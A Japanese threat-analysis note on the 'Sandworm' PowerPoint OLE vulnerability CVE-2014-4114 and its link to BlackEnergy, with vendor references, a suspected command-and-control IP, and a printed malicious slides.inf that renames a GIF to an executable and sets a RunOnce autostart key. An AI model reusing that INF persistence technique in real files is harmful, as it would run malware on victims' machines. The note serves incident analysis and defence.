発見日

• 2014年9月3日

悪用が確認されているPowerPoint関係のファイルについて

CVE-2014-4114が埋め込まれたPowerPointファイルが確認されている。ファイルの種別によって挙動が異なる。

OLEについて

OLE とは何ですか?
OLE (Object Linking and Embedding) は、複合データを作成および編集する機能など、データや機能をアプリケーションで共有できるようにするテクノロジです。複合データとは、複数の形式の情報が含まれるデータです。たとえば、複合 Microsoft Word 文書には、埋め込み Microsoft Excel スプレッドシート (つまり OLE オブジェクト) が含まれる場合があります。このテクノロジにより、埋め込み先での編集も可能になります。OLE オブジェクトがアクティブにされている際、新たなアプリケーションは起動せず、その代わり、ユーザーがそれまで使用していたアプリケーション内に新たなメニュー アイテムのセットが表示されます。OLE の詳細については、「Compound Documents」(英語情報) を参照してください。

https://technet.microsoft.com/ja-jp/library/security/MS14-060

関連情報

• Malware BlackEnegyに関する調査
  • ArborNetworksが2007年に最初に報告した
  • DellSecureworks BlackEnergy Version 2 Analysis
  • F-Secure (PDF) BLACKENERGY & QUEDAGH
  • F-Secure BlackEnergy Rootkit, Sort Of
  • F-Secure Beware BlackEnergy If Involved In Europe/Ukraine Diplomacy
  • ESET Back in BlackEnergy *: 2014 Targeted Attacks in Ukraine and Poland

PPSXの内容と思われるもの

• http://www.slideshare.net/andrewvitalievich1/spiski-deputatov-done

Slides.infの内容(一部?)

; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
　
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
　
[DestinationDirs]
DefaultDestDir = 1
　
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
　
[RxRename]
slide1.gif.exe, slide1.gif
[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe

http://pastebin.com/rfYAdRrF

接続先と思われるIPアドレス

94.185.85.122

https://www.virustotal.com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf/analysis/

関連リンク

• An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”(TrendMicro)
• Sandworm Windows zero-day vulnerability being actively exploited in targeted attacks (Symantec)
• Microsoft Windows のOLEオブジェクトが含まれるOfficeファイルの不具合により、リモートより任意のコードが実行される脆弱性(CVE-2014-4114)に関する検証レポート — (n)